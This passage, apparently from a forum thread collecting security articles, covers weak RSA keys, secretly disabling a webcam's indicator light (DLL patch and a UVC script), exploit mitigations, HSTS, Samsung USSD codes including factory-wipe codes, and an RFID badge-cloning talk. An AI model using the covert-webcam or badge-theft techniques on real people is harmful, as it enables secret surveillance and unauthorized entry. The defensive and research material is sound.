RSA and DSA can fail catastrophically when used with malfunctioning random number generators, but the extent to which these problems arise in practice has never been comprehensively studied at Internet scale. We perform the largest ever network survey of TLS and SSH servers and present evidence that vulnerable keys are surprisingly widespread. We find that 0.75% of TLS certificates share keys due to insufficient entropy during key generation, and we suspect that another 1.70% come from the same faulty implementations and may be susceptible to compromise. Even more alarmingly, we are able to obtain RSA private keys for 0.50% of TLS hosts and 0.03% of SSH hosts, because their public keys shared nontrivial common factors due to entropy problems, and DSA private keys for 1.03% of SSH hosts, because of insufficient signature randomness. We cluster and investigate the vulnerable hosts, finding that the vast majority appear to be headless or embedded devices. In experiments with three software components commonly used by these devices, we are able to reproduce the vulnerabilities and identify specific software behaviors that induce them, including a boot-time entropy hole in the Linux random number generator. Finally, we suggest defenses and draw lessons for developers, users, and the security community.

Download

Download the conference version or the more detailed extended version.

@InProceedings{weakkeys12,
  author    = {Nadia Heninger and Zakir Durumeric and Eric Wustrow and J. Alex Halderman},
  title     = {Mining Your {P}s and {Q}s: {D}etection of Widespread Weak Keys in Network Devices},
  booktitle = {Proceedings of the 21st {USENIX} Security Symposium},
  month     = aug,
  year      = 2012
}

Source: https://factorable.net/paper.html
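The paper's core observation about shared nontrivial common factors can be illustrated in a few lines: if two RSA moduli share a prime, a plain GCD recovers it. A sketch with toy numbers (real moduli are 1024/2048-bit, but GCD stays cheap at that size):

[code]
from math import gcd

# Two toy RSA moduli that accidentally share the prime p, as happens
# when key generation runs with too little entropy.
p, q1, q2 = 101, 103, 107
n1, n2 = p * q1, p * q2

shared = gcd(n1, n2)  # cheap even for real-world key sizes
assert shared == p
print(f"recovered factor {shared}; cofactors {n1 // shared} and {n2 // shared}")
[/code]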
  9. C. Then C++. Then whatever junk your heart desires.
  10. How to disable webcam light on Windows
By Robert Graham

In recent news, it was revealed that the FBI has a "virus" that will record a suspect through the webcam secretly, without turning on the LED light. Some researchers showed this working on an older MacBook. In this post, we do it on Windows.

Hardware, firmware, driver, software

In theory, the indicator light should be a hardware function: when power is supplied to the sensor, it should also be supplied to an indicator light. This would make the light impossible to hack. However, I don't think anybody does this.

In some cases, it's a firmware function. Webcams have their own wimpy microprocessors and run code directly within the webcam; controlling the light is one of those firmware functions. Some, like Steve Jobs, might describe this as "hardware" control, because it resides wholly within the webcam hardware, but it's still a form of software. This is especially true because firmware blobs are unsigned and can therefore be hacked. In other cases, it's the driver – either the kernel-mode driver that interfaces at a low level with the hardware, or a DLL that interfaces at a high level with software.

How to

As reverse engineers, we simply grab these bits of software/firmware/drivers and open them in our reverse engineering tools, like IDA Pro. It doesn't take us long to find something to hack. For example, on our Dell laptop, we find the DLL that comes with the Realtek drivers for our webcam. We quickly zero in on the exported function "TurnOnOffLED()". We can quickly make a binary edit to this routine, causing it to return immediately without turning on the light. Dave shows this in the video below. First, the light turns on as normal; then he stops the webcam, replaces the DLLs with his modified ones, and turns on the webcam again. As the video shows, after the change the webcam is recording him recording the video, but the light is no longer on.

The deal with USB

Almost all webcams, even those inside your laptop's screen, are USB devices. There is a standard for USB video cameras, the UVC standard. This means most hardware will run under standard operating systems (Windows, Mac, Linux) without drivers from the manufacturer – at least enough to get Skype working. Only the more advanced features particular to each vendor need vendor-specific drivers. According to this standard, the LED indicator light is controlled by the host software. The UVC utilities that come with Linux allow you to control this light directly with a command-line tool, turning off the light while the camera is on (see the sketch at the end of this post). To hack this on Windows appears to require a filter driver. We are too lazy to write one, which is why we just hacked the DLLs in the demonstration above. We believe this is what the FBI has done: a filter driver for the UVC standard would cover most webcam products from different vendors, without the FBI having to write a custom hack for each vendor.

USB has lots of interesting features. It's designed with the idea that a person without root/administrator access may still want to plug in a device and use it. Therefore, there is the idea of "user-mode" drivers, where a non-administrator can nonetheless install drivers to access the USB device. This can be exploited with the Device Firmware Update (DFU) standard. It means that in many cases, the firmware of the webcam can be updated in user mode, without administrator privileges.
The researchers in the paper above demonstrate this with a 2008 MacBook, but in principle it should work on modern Windows 7 notebook computers as well, using most devices. The problem for a hacker is that they would have to build a hacked firmware for lots of different webcam chips. The upside is that they can do all this without getting root/administrator access to the machine.

Conclusion

In the above video, Dave shows that the story of the FBI virus secretly enabling the webcam can work on at least one Windows machine. In our research, we believe it can be done generically across almost any webcam, using almost any operating system.

Source: Errata Security: How to disable webcam light on Windows
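On the Linux/UVC side mentioned above, a hedged sketch: the uvcdynctrl tool (from the libwebcam package) can list and set UVC controls, and some Logitech cameras expose an "LED1 Mode" control. Both the device node and the control name are assumptions that vary by vendor; many cameras expose no LED control at all.

[code]
import subprocess

DEVICE = "/dev/video0"  # assumption: first video device is the webcam

# List the controls this camera actually exposes.
subprocess.run(["uvcdynctrl", "-d", DEVICE, "-c"], check=True)

# On cameras that expose an LED control (e.g. some Logitech models),
# "LED1 Mode" = 0 forces the indicator off; the control name is
# vendor-specific and may simply not exist on your hardware.
subprocess.run(["uvcdynctrl", "-d", DEVICE, "-s", "LED1 Mode", "0"],
               check=True)
[/code]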
  11. Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Officially Released
December 20th, 2013, 08:35 GMT · By Silviu Stahie

Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) has been released and is now available for download and testing. We prepared a screenshot tour for a sneak peek at the new operating system.

The best news for fans of Ubuntu GNOME is that 14.04 will include a number of GNOME applications from the 3.10 stack. Also, the GNOME Classic session has been included; to try it, users just have to choose it from the Sessions option on the login screen.

"The Alpha 1 Trusty Tahr snapshot includes the 3.12.0.7 Ubuntu Linux kernel which is based on the upstream v3.12.4 Linux kernel. The 3.12 release contains improvements to the dynamic tick code, support infrastructure for DRM render nodes, TSO sizing and the FQ scheduler in the network layer, support for user namespaces in the XFS filesystem, multithreaded RAID5 in the MD subsystem, and more," reads the official announcement. Check it out for more details about this release.

Download Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) right now from Softpedia. Remember that this is a development version and it should NOT be installed on production machines. It is intended for testing purposes only.

Source: Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Officially Released – Screenshot Tour
  12. Exploit Protection for Microsoft Windows
By Guest Writer, posted 13 Dec 2013 at 05:52AM

Software exploits are an attack technique used to silently install various malware – such as Trojans or backdoors – on a user's computer, without requiring social engineering to trick the victim into manually running a malicious program. Malware installation through an exploit is invisible to the user and gives attackers an undeniable advantage. Exploits attempt to use vulnerabilities in particular operating system or application components in order to allow malware to execute. In our previous blog post, titled Solutions to current antivirus challenges, we discussed several methods by which security companies can tackle the exploit problem. In this post, we provide more detail on the most exploited applications on Microsoft Windows platforms and advise a few steps users can (and should) take to further strengthen their defenses.

Exploitation Targets

The following applications are the ones most targeted by attackers through exploitation:
• Web browsers (Microsoft Internet Explorer, Google Chrome, Apple Safari, Mozilla Firefox and others)
• Plug-ins for browsers (Adobe Flash Player, Oracle Java, Microsoft Silverlight)
• The Windows operating system itself – notably the Win32 subsystem driver, win32k.sys
• Adobe Reader and Adobe Acrobat
• Other specific applications

Different types of exploits are used in different attack scenarios. One of the most dangerous scenarios for an everyday user is the use of exploits to remotely install code into the operating system. In such cases, we usually find that the user has visited a compromised web resource and their system has been invisibly infected by malicious code (an attack often referred to as a "drive-by download"). If your computer is running a version of software such as a web browser or browser plug-in that is vulnerable to exploitation, the chances of your system becoming infected with malware are very high, due to the lack of mitigation from the software vendor.

In targeted attacks, or attacks like a "watering hole" attack, where the attacker plants the exploit code on websites visited by the victim, the culprit can use zero-day (0-day) vulnerabilities in software or the operating system. Zero-day vulnerabilities are those that have not been patched by the vendor at the time they are being exploited by attackers.

Another common technique used in targeted attacks is to send the victim a PDF document "equipped" with an exploit. Social engineering is often used as well, for example by selecting a filename and document content in such a way that the victim is likely to open it. While PDFs are first and foremost document files, Adobe has extended the file format to maximize its data exchange functionality by allowing scripting and the embedding of various objects into files, and this can be exploited by an attacker. Most PDF files are safe, but some can be dangerous, especially if obtained from unreliable sources. When such a document is opened in a vulnerable PDF reader, the exploit code triggers the malicious payload (such as installation of a backdoor), and a decoy document is often opened.

Another target which attackers really love is Adobe Flash Player, as this plug-in is used for playback of content across all the different browsers. Like other software from Adobe, Flash Player is updated regularly as advised by the company's updates (see Adobe Security Bulletins).
Most of these vulnerabilities are of the Remote Code Execution (RCE) type, which means that attackers could use such a vulnerability to remotely execute malicious code on a victim's computer. In relation to the browser and operating system, Java is a virtual machine (or runtime environment, the JRE) able to execute Java applications. Java applications are platform-independent, making Java a very popular tool: today it is used by more than three billion devices. As with other browser plug-ins, misusing the Java plug-in is attractive to attackers, and given our previous experience of the malicious actions and vulnerabilities with which it is associated, we can say that as browser plug-ins go, Java represents one of the most dangerous components.

Also, various components of the Windows operating system itself can be used by attackers to remotely execute code or elevate privileges. The figure below shows the number of patches various Windows components received during 2013 (up until November).

Chart 1: Number of patches per component

The "Others" category includes vulnerabilities which were fixed in various operating system components (CSRSS, SCM, GDI, Print Spooler, XML Core Services, OLE, NFS, Silverlight, Remote Desktop Client, Active Directory, RPC, Exchange Server). This ranking shows that Internet Explorer had the largest number of vulnerabilities fixed: more than a hundred, across fourteen updates. Seven of the vulnerabilities had the status 'is-being-exploited-in-the-wild' at the time of patching: that is, they were being actively exploited by attackers. The second most-patched component of the operating system is the infamous Windows subsystem driver win32k.sys. Vulnerabilities in this driver are used by attackers to escalate privileges on the system, for example to bypass restrictions imposed by User Account Control (UAC), a least-privilege mechanism introduced by Microsoft in Windows Vista to reduce the risk of compromise by an attack that requires administrator privileges.

Mitigation techniques

We now look in more detail at the most exploited applications and provide some steps that you can (and should) take to mitigate attacks and further strengthen your defenses.

Windows Operating System

Modern versions of Microsoft Windows – i.e., Windows 7, 8, and 8.1 at the time of writing – have built-in mechanisms which can help to protect the user from destructive actions delivered by exploits. Such features became available starting with Windows Vista and have been upgraded in the most recent operating system versions. These features include:

• DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization), mechanisms which introduce an extra layer of complication when attempting to exploit vulnerabilities in applications and the operating system. This is achieved through special restrictions on memory that should not be used to execute code, and the placement of program modules in memory at random addresses.
• UAC (User Account Control), which was upgraded from Windows 7 onward and requires confirmation from the user before programs can run that need to change system settings or create files in system directories.
• SmartScreen Filter, which helps to prevent the downloading of malicious software from the Internet based on a file's reputation: files known to be malicious, or not recognized by the filter, are blocked.
Originally, SmartScreen was part of Internet Explorer, but with the release of Windows 8 it was built into the operating system, so it now works with all browsers.

• A special "Enhanced Protected Mode" for Internet Explorer (starting from IE10): on Windows 8 this mode allows the browser's tabs to be run in the context of isolated processes, which are prevented from performing certain actions (a technique also known as sandboxing). For Windows 7 x64 (64-bit), this feature allows IE to run tabs as separate 64-bit processes, which helps to mitigate the common heap-spray method of shellcode delivery. For more information, refer to the MSDN blog (here and here).

PDF files

In view of the high risks posed by the use of PDF documents from unsafe sources, and given the low awareness of many users and their reluctance to protect themselves adequately, modern versions of Adobe Reader have a special "Protected Mode" (also referred to as sandboxing) for viewing documents. When this mode is used, code from the PDF file is prevented from executing certain potentially dangerous functions.

Figure 2: "Sandbox" mode options for Adobe Reader can be enabled through Edit -> Preferences -> Security (Enhanced).

By default, Protected Mode is turned off. Despite the active option "Enable Protected Mode at startup", sandbox mode stays turned off because the protected view setting is set to the "Disabled" status. Accordingly, after installation it is strongly recommended that you turn on this setting for "Files From Potentially Unsafe Locations" or, even better, "All files". Please note that when you turn on protected view, Adobe Reader disables several features which can be used in PDF files. Therefore, when you open a file, you may receive a tooltip alert advising you that protected mode is active.

Figure 3: Tooltip which indicates active protected mode.

If you are sure about the origin and safety of the file, you can activate all of its functions by pressing the appropriate button.

Adobe Flash Player

Adobe, together with the manufacturers of web browsers, has made available special features and protective mechanisms to defend against exploits that target the Flash Player plug-in. Browsers such as Microsoft Internet Explorer (starting with version 10 on Windows 8.0 and later), Google Chrome and Apple Safari (latest version) launch Flash Player in the context of a specially restricted (i.e. sandboxed) process, limiting the ability of this process to access many system resources and places in the file system, and limiting how it communicates with the network.

Timely updating of the Flash Player plug-in for your browser is very important. Google Chrome and Internet Explorer 10+ are automatically updated with the release of new versions of Flash Player. To check your version of Adobe Flash Player, you can use the official Adobe resource. In addition, most browsers support the ability to completely disable the Flash Player plug-in, so as to prohibit the browser from playing such content.

Internet Browsers

At the beginning of this article we mentioned that attackers often rely on delivering malicious code using remote code execution through the browser (drive-by downloads). Regardless of what browser plug-ins are installed, the browser itself may contain a number of vulnerabilities known to the attacker (and possibly not known to the browser vendor).
If a vulnerability has been patched by the developer and an update is available, the user can install it without worrying that it will be used to compromise the operating system. On the other hand, if the attackers are using a previously unknown vulnerability – in other words, one that has not yet been patched (a zero-day) – the situation is more complicated for the user.

Modern browsers and operating systems incorporate special technologies for isolating application processes, creating special restrictions on performing various actions which the browser should not be able to perform. In general, this technique is called sandboxing, and it allows users to limit what a process can do. One example of this isolation is the fact that modern browsers (for example, Google Chrome and Internet Explorer) execute tabs as separate processes in the operating system, allowing restricted permissions for certain actions in a specific tab as well as maintaining the stability of the browser as a whole. If one of the tabs hangs, the user can terminate it without terminating the other tabs.

In modern versions of Microsoft's Internet Explorer browser (IE10 and IE11) there is a special sandboxing technology called "Enhanced Protected Mode" (EPM). This mode allows you to restrict the activity of a tab process or plug-in and thus make exploitation much more difficult for attackers.

Figure 4: Enhanced Protected Mode option turned on in Internet Explorer settings (available since IE10). On Windows 8+ (IE11) it was turned on by default before applying MS13-088.

EPM was upgraded for Windows 8. If you are using EPM on Windows 7 x64, this feature causes browser tabs to run as 64-bit processes (on a 64-bit OS, Internet Explorer runs its tabs as 32-bit processes by default). Note that by default EPM is off.

Figure 5: Demonstration of EPM at work on Windows 7 x64 [using Microsoft Process Explorer]. With this option turned on, the browser tab processes run as 64-bit, making them harder to use for malicious code installation (or at least more resistant to heap-spraying attacks).

Starting with Windows 8, Enhanced Protected Mode has been expanded to isolate (sandbox) a process's actions at the operating system level. This technology is called "AppContainer" and allows the maximum possible benefit from the use of the EPM option. Internet Explorer tab processes with the EPM option active work in AppContainer mode. In addition, on Windows 8, EPM mode is enabled by default (IE11).

Figure 6: EPM implementation in Windows 8. On Windows 7 x64, EPM uses 64-bit processes for IE tabs for mitigation, instead of AppContainer.

Note that before the November 2013 Patch Tuesday, which included the MS13-088 update (Cumulative Security Update for Internet Explorer: November 12, 2013), Microsoft shipped EPM as the default setting for IE11 on Windows 8+. This update, however, disables EPM as the default setting. So now, if you reset advanced IE settings to their initial state (the "Restore advanced settings" option), EPM will be turned off by default.

Google Chrome, like Internet Explorer, has special features to mitigate drive-by download attacks. But unlike Internet Explorer, sandboxing in Chrome is always active and requires no additional action by the user. This means that Chrome tab processes work with restricted privileges, which prevents them from performing various system actions.

Figure 7: Sandboxing mode as implemented in Google Chrome.
Notice that almost all of the user’s SID groups in the access token have the “Deny” status, restricting access to the system. Additional information can be found on MSDN.

In addition to this mode, Google Chrome is able to block malicious URLs or websites which have been blacklisted by Google because of malicious actions (Google Safe Browsing). This feature is similar to Internet Explorer’s SmartScreen.

Figure 8: Google Safe Browsing in Google Chrome blocking a suspicious webpage.

Java

When you use Java on Windows, its security settings can be changed using the control panel applet. In addition, the latest version contains security settings which allow you to configure the environment more precisely, allowing only trusted applications to run.

Figure 9: Options for updating Java.

To completely disable Java in all browsers used on the system, remove the option “Enable Java content in the browser” in the Java settings.

Figure 10: Java setting to disable its use in all browsers.

EMET

Microsoft has released a free tool to help users protect the operating system from the malicious actions used in exploits.

Figure 11: EMET interface.

The Enhanced Mitigation Experience Toolkit (EMET) uses preventive methods to block various actions typical of exploits and to protect applications from attacks. Although Windows 7 and Windows 8 have built-in DEP and ASLR options, which are enabled by default and intended to mitigate the effects of exploitation, EMET introduces additional features for blocking the actions of exploits and can enable DEP or ASLR for specified processes (increasing system protection on older versions of the OS). This tool must be configured separately for each application: in other words, to protect an application using this tool, you need to include that specific application in the list. There is also a list of applications for which EMET is enabled by default: for example, the Internet Explorer browser, Java and Microsoft Office. It’s a good idea to add your favorite browser and Skype to the list.

Operating System Updates

Keeping your operating system and installed software promptly updated and patched is good practice, because vendors regularly use patches and updates to address emerging vulnerabilities. Note that Windows 7 and 8 deliver updates to the user automatically by default. You can also check for updates through the Windows Control Panel as shown below.

Figure 12: Windows Update

Generic Exploit Blocking

So far, we have looked at blocking exploits that are specific to the operating system or the applications you are using. You may also want to look at blocking exploits in general, and you may be able to turn to your security software for this. For example, ESET introduced something called the Exploit Blocker in the seventh generation of its security products, the anti-malware programs ESET Smart Security and ESET NOD32 Antivirus. The Exploit Blocker is a proactive mechanism that works by analyzing suspicious program behavior and generically detecting signs of exploitation, regardless of the specific vulnerability that was used.

Figure 13: ESET Exploit Blocker option turned on in HIPS settings.

Conclusion

Any operating system or program which is widely used will be studied by attackers for vulnerabilities to exploit for illicit purposes and financial gain. As we have shown above, Adobe, Google and Microsoft have taken steps to make these types of attacks against their software more difficult.
However, no single protection technique can be 100% effective against determined adversaries, and users have to remain vigilant about patching their operating systems and applications. Since some vendors update their software on a monthly basis, or even less frequently, it is important to use (and keep updated) anti-malware software which blocks exploits.

This article was contributed by: Artem Baranov, Lead Virus Analyst for ESET’s Russian distributor.

Author: Guest Writer, We Live Security

Sursa: Exploit Protection for Microsoft Windows
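(Appended note, referenced from the EPM discussion above.) One way to observe the 64-bit-tabs behaviour on Windows 7 x64 is to enumerate the iexplore.exe processes and ask Windows whether each one runs under WOW64 (i.e. is 32-bit). This is a hedged sketch, not part of the original article; it assumes a 64-bit Windows host and the third-party psutil package:

# Hedged sketch: list running iexplore.exe processes and report whether
# each is a 32-bit (WOW64) or native 64-bit process.
import ctypes
import psutil  # third-party: pip install psutil

kernel32 = ctypes.windll.kernel32
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

def is_wow64(pid):
    """Return True if the process runs under WOW64 (32-bit), False if native."""
    handle = kernel32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
    if not handle:
        return None  # access denied or process already gone
    try:
        flag = ctypes.c_int(0)
        if not kernel32.IsWow64Process(handle, ctypes.byref(flag)):
            return None
        return bool(flag.value)
    finally:
        kernel32.CloseHandle(handle)

for proc in psutil.process_iter(["pid", "name"]):
    if (proc.info["name"] or "").lower() == "iexplore.exe":
        wow = is_wow64(proc.info["pid"])
        label = {True: "32-bit (WOW64)", False: "64-bit", None: "unknown"}[wow]
        print(proc.info["pid"], label)

With EPM off you would expect the tab processes to show up as 32-bit (WOW64); with EPM on, as 64-bit, matching the Process Explorer demonstration in Figure 5.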
  13. HSTS – The missing link in Transport Layer Security

Posted on November 30, 2013 by Scott Helme

HTTP Strict Transport Security (HSTS) is a policy mechanism that allows a web server to enforce the use of TLS in a compliant User Agent (UA), such as a web browser. HSTS allows for a more effective implementation of TLS by ensuring all communication takes place over a secure transport layer on the client side. Most notably, HSTS mitigates variants of man in the middle (MiTM) attacks where TLS can be stripped out of communications with a server, leaving a user vulnerable to further risk.

Introduction

In a previous blog I demonstrated using SSLstrip to MiTM SSL and the dangers it posed. Once installed as a MiTM, SSLstrip will connect to a server on behalf of the victim and communicate using HTTPS. The server is satisfied with the secure communication to the attacker, who then transparently forwards all data to the victim using HTTP. This is possible because the victim does not enforce the use of TLS: either they typed in twitter.com and the browser defaulted to http://, or they were using a bookmark or link that contained http://. Once Twitter receives the request it issues a redirect back to the victim’s browser pointing to the https:// URL. Because all of this is done using HTTP, the communications are vulnerable to interception and modification by SSLstrip. Crucially, the user receives no warnings during the attack and can’t verify if they should be using https://. HSTS mitigates this threat by providing an option to enforce the use of TLS in the browser, preventing the user from navigating to the site using http://.

Implementing HSTS

In order to implement HSTS a host must declare to a UA that it is a HSTS Host by issuing a HSTS Policy. This is done with the addition of the HTTP response header ‘Strict-Transport-Security: max-age=31536000‘. The max-age directive is required and can be any value from 0 upwards, which is the number of seconds after receiving the policy that the UA is to treat the host issuing it as a HSTS Host. It’s worth noting that a max-age directive value of 0 informs the UA to cease treating the host that issued it as a HSTS Host and to remove all policy. It does not imply an infinite max-age directive value. There is also an optional includeSubDomains directive that can be included at the discretion of the host, such as ‘Strict-Transport-Security: max-age=31536000; includeSubDomains‘. This would, as expected, inform the UA that all subdomains are to be treated as HSTS Hosts also. (A minimal example of a server issuing this header can be found at the end of this post.)

Twitter’s HSTS Policy

The HSTS response header should only be sent over a secure transport layer, and UAs should ignore this header if received over HTTP. This is primarily because an attacker running a MiTM attack could maliciously strip out or inject this header into a HTTP response, causing undesired behaviour. This does, however, present a very slim window of opportunity for an attacker in a targeted attack. Upon a user’s very first interaction with Twitter, the browser will have no knowledge of a HSTS Policy for the host. This will result in the first communication taking place over HTTP and not HTTPS. Once Twitter receives the request and replies with a redirect to a HTTPS version of the site, still using HTTP, an attacker could simply effect a MiTM attack against the victim as they would before. The viability of this form of attack has, however, been tremendously reduced overall.
The only opportunity the attacker now has is to be set up and ready to intercept the very first communication ever made with the host, or to wait until the HSTS Policy expires after the victim has had no further communication with the host for the duration of the max-age directive.

HSTS Header sent via HTTPS

No HSTS Header sent via HTTP

Once the user has initiated communications with a host that declares a valid HSTS Policy, the UA will consider the host to be a HSTS Host for the duration of max-age and store the policy. During this time the UA will afford the user the following protections.

1. UAs transform insecure URI references to an HSTS Host into secure URI references before dereferencing them.

2. The UA terminates any secure transport connection attempts upon any and all secure transport errors or warnings.

(source)

Point 1 means that once Twitter has been accepted by the UA as a HSTS Host, the UA will replace any reference to http:// with https:// where the host is twitter.com (and its subdomains if specified) before it sends the request. This includes links found on any webpage that use http://, shortcuts or bookmarks that may specify http://, and even user input such as the address bar. Even if http:// is explicitly defined as the protocol of choice, the UA will enforce https://.

Point 2 is also fairly important, if not as important as point 1. By terminating the connection as soon as a warning or error message is triggered, the UA prevents the user from clicking through them. This commonly happens when the user does not understand what the message is saying or because they are not concerned about the security of the connection. Many attacks depend on the poor manner in which users are informed of potential risk and the poor response from users to such warnings. Simply terminating the connection when there is cause for any uncertainty provides the highest possible level of protection to the user. It even stops you accidentally clicking through an error message!

So, once a user has a valid HSTS Policy in place, their request to http://twitter.com should go from something like this:

Initial request uses HTTP with no HSTS policy enforced

To something like this instead:

All requests use HTTPS when HSTS is enforced

This can also be verified using the Chrome Developer Tools. Open a new tab, click the Chrome Menu in the top right, then select Tools -> Developer Tools and open the network tab. Now navigate to http://twitter.com (you must have visited the site before). You can see the initial request that would have gone to http://twitter.com is not sent, and the browser immediately replaces it with a request to https://twitter.com instead.

Request using HTTP is not sent

HTTP request replaced with HTTPS equivalent

HSTS In Practice

Whilst not yet widely deployed, HSTS has started to make a more widespread appearance since the specification was published in Nov 2012. Below you can see that both Twitter and Facebook have the HSTS response header set, though Facebook doesn’t appear to have a very long max-age value.

Twitter:

Facebook:

Out of interest I decided to check a selection of websites for high street banks and see if any had yet implemented a HSTS Policy. Having checked Barclays, Halifax, HSBC, Nationwide, Natwest, RBS, Santander and Yorkshire Bank, I was disappointed to find that none had yet implemented a HSTS Policy, and some of them even have a dedicated online banking domain name.
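A quick way to repeat this kind of survey is to request each site over HTTPS and inspect the response headers. Here is a minimal sketch in Python; the hostnames are just examples, and some servers may not answer a bare HEAD request:

# Request each site over HTTPS and print any HSTS policy it declares.
import http.client

def get_hsts(host):
    conn = http.client.HTTPSConnection(host, timeout=10)
    conn.request("HEAD", "/")
    return conn.getresponse().getheader("Strict-Transport-Security")

for host in ("twitter.com", "www.facebook.com", "www.barclays.co.uk"):
    try:
        print(host, "->", get_hsts(host) or "no HSTS header")
    except OSError as exc:
        print(host, "-> error:", exc)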
Preloaded HSTS

It is also possible for a browser to ship with a preloaded list of HSTS Hosts. The Chrome and Firefox browsers both feature a built-in list of sites that will always be treated as HSTS Hosts regardless of the presence of the HSTS response header. Websites can opt in to be included in the list of preloaded hosts, and you can view the Chromium Source to see all the hosts already included. For sites preloaded in the browser there is no state in which communications will take place that do not travel on a secure transport layer. Be that the initial communication, the first communication after wiping the local cache, or any communication after a policy would have expired, the user cannot exchange data using HTTP. The browser will afford the protection of HSTS for the applicable hosts at all times. Unfortunately this solution isn’t really scalable, considering the sheer number of sites that could potentially be included. That said, if all financial institutions, government sites, social networks and any other potentially large targets applied to be included, they could mitigate a substantial amount of risk.

Conclusion

HSTS has been a highly anticipated and much-needed solution to the problems of HTTP being the default protocol for a UA and the lack of an ability for a host to reliably enforce secure communications. For any site that issues permanent redirects to HTTPS, the addition of the HSTS response header is a much safer way of enforcing secure communications for compliant UAs. By preventing the UA from sending even the very first request via HTTP, HSTS removes the only opportunity a MiTM has to gain a foothold in a secure transport layer.

Scott.

Short URL: http://scotthel.me/hsts

Sursa: https://scotthelme.co.uk/hsts-the-missing-link-in-tls/
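(Appended note, referenced from the "Implementing HSTS" section above.) This is a minimal sketch of what issuing the policy looks like on the server side, using only Python's standard library; server.pem is a placeholder test certificate bundle, and the header value mirrors the article's example:

# Serve HTTPS and declare this host an HSTS Host for one year,
# covering subdomains.
import http.server
import ssl

class HSTSHandler(http.server.SimpleHTTPRequestHandler):
    def end_headers(self):
        # Issue the HSTS Policy on every response.
        self.send_header("Strict-Transport-Security",
                         "max-age=31536000; includeSubDomains")
        super().end_headers()

httpd = http.server.HTTPServer(("0.0.0.0", 4443), HSTSHandler)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain("server.pem")  # placeholder cert/key for testing
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()

Remember that, per the article, compliant UAs only honour this header when it arrives over a secure transport layer, so serving it over plain HTTP achieves nothing.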
  14. [REF] List of USSD codes!

by kevhuff

Thought I would compile a list of USSD codes for everyone's reference. I have tested most of them; if anybody has any to add, please feel free.

****Warning: some of these codes can be harmful (wipe data, etc.). I am not responsible for anything you do to your device****

Some of these codes may lead you to a menu; use the option key (far left soft key) to navigate. Some of the functions may be locked to our use, but I'm still working on how to use these menus more extensively.

Information
*#44336# Software Version Info
*#1234# View SW Version PDA, CSC, MODEM
*#12580*369# SW & HW Info
*#197328640# Service Mode
*#06# = IMEI Number.
*#1234# = Firmware Version.
*#2222# = H/W Version.
*#8999*8376263# = All Versions Together.
*#272*imei#* Product code
*#*#3264#*#* - RAM version
*#92782# = Phone Model
*#*#9999#*#* = Phone/pda/csc info

Testing
*#07# Test History
*#232339# WLAN Test Mode
*#232331# Bluetooth Test Mode
*#*#232331#*#* - Bluetooth test
*#0842# Vibration Motor Test Mode
*#0782# Real Time Clock Test
*#0228# ADC Reading
*#32489# (Ciphering Info)
*#232337# Bluetooth Address
*#0673# Audio Test Mode
*#0*# General Test Mode
*#3214789650# LBS Test Mode
*#0289# Melody Test Mode
*#0589# Light Sensor Test Mode
*#0588# Proximity Sensor Test Mode
*#7353# Quick Test Menu
*#8999*8378# = Test Menu.
*#*#0588#*#* - Proximity sensor test
*#*#2664#*#* - Touch screen test
*#*#0842#*#* - Vibration test

Network
*7465625*638*# Configure Network Lock MCC/MNC
#7465625*638*# Insert Network Lock Keycode
*7465625*782*# Configure Network Lock NSP
#7465625*782*# Insert Partial Network Lock Keycode
*7465625*77*# Insert Network Lock Keycode SP
#7465625*77*# Insert Operator Lock Keycode
*7465625*27*# Insert Network Lock Keycode NSP/CP
#7465625*27*# Insert Content Provider Keycode
*#7465625# View Phone Lock Status
*#232338# WLAN MAC Address
*#526# WLAN Engineering Mode - runs WLAN tests (same as below)
*#528# WLAN Engineering Mode
*#2263# RF Band Selection - not sure about this one, appears to be locked
*#301279# HSDPA/HSUPA Control Menu - change HSDPA classes (opt. 1-5)

Tools/Misc.
*#*#1111#*#* - Service Mode
#273283*255*663282*# Data Create SD Card
*#4777*8665# = GPSR Tool.
*#4238378# GCF Configuration
*#1575# GPS Control Menu
*#9090# Diagnostic Configuration
*#7284# USB I2C Mode Control - mount to USB for storage/modem
*#872564# USB Logging Control
*#9900# System dump mode - can dump logs for debugging
*#34971539# Camera Firmware Update
*#7412365# Camera Firmware Menu
*#273283*255*3282*# Data Create Menu - change sms, mms, voice, contact limits
*2767*4387264636# Sellout SMS / PCODE view
*#3282*727336*# Data Usage Status
*#*#8255#*#* - Show GTalk service monitor - great source of info
*#3214789# GCF Mode Status
*#0283# Audio Loopback Control
#7594# Remap Shutdown to End Call TSK
*#272886# Auto Answer Selection

****SYSTEM**** USE CAUTION
*#7780# Factory Reset
*2767*3855# Full Factory Reset
*#*#7780#*#* Factory data reset
*#745# RIL Dump Menu
*#746# Debug Dump Menu
*#9900# System Dump Mode
*#8736364# OTA Update Menu
*#2663# TSP / TSK firmware update
*#03# NAND Flash S/N

BAM!!!!

Sursa: [REF] List of USSD codes! [updated 10-30] - xda-developers
  15. Defcon 21 - Rfid Hacking: Live Free Or Rfid Hard

Description: Have you ever attended an RFID hacking presentation and walked away with more questions than answers? This talk will finally provide practical guidance on how RFID proximity badge systems work. We'll cover what you'll need to build out your own RFID physical penetration toolkit, and how to easily use an Arduino microcontroller to weaponize commercial RFID badge readers — turning them into custom, long-range RFID hacking tools.

This presentation will NOT weigh you down with theoretical details, discussions of radio frequencies and modulation schemes, or talk of inductive coupling. It WILL serve as a practical guide for penetration testers to understand the attack tools and techniques available to them for stealing and using RFID proximity badge information to gain unauthorized access to buildings and other secure areas. Schematics and Arduino code will be released, and 100 lucky audience members will receive a custom PCB they can insert into almost any commercial RFID reader to steal badge info and conveniently save it to a text file on a microSD card for later use (such as badge cloning). This solution will allow you to read cards from up to 3 feet away, a significant improvement over the few centimeter range of common RFID hacking tools.

Some of the topics we will explore are:

Overview of best RFID hacking tools available to get for your toolkit
Stealing RFID proximity badge info from unsuspecting passers-by
Replaying RFID badge info and creating fake cloned cards
Brute-forcing higher privileged badge numbers to gain data center access
Attacking badge readers and controllers directly
Planting PwnPlugs, Raspberry Pis, and similar devices as physical backdoors to maintain internal network access
Creating custom RFID hacking tools using the Arduino
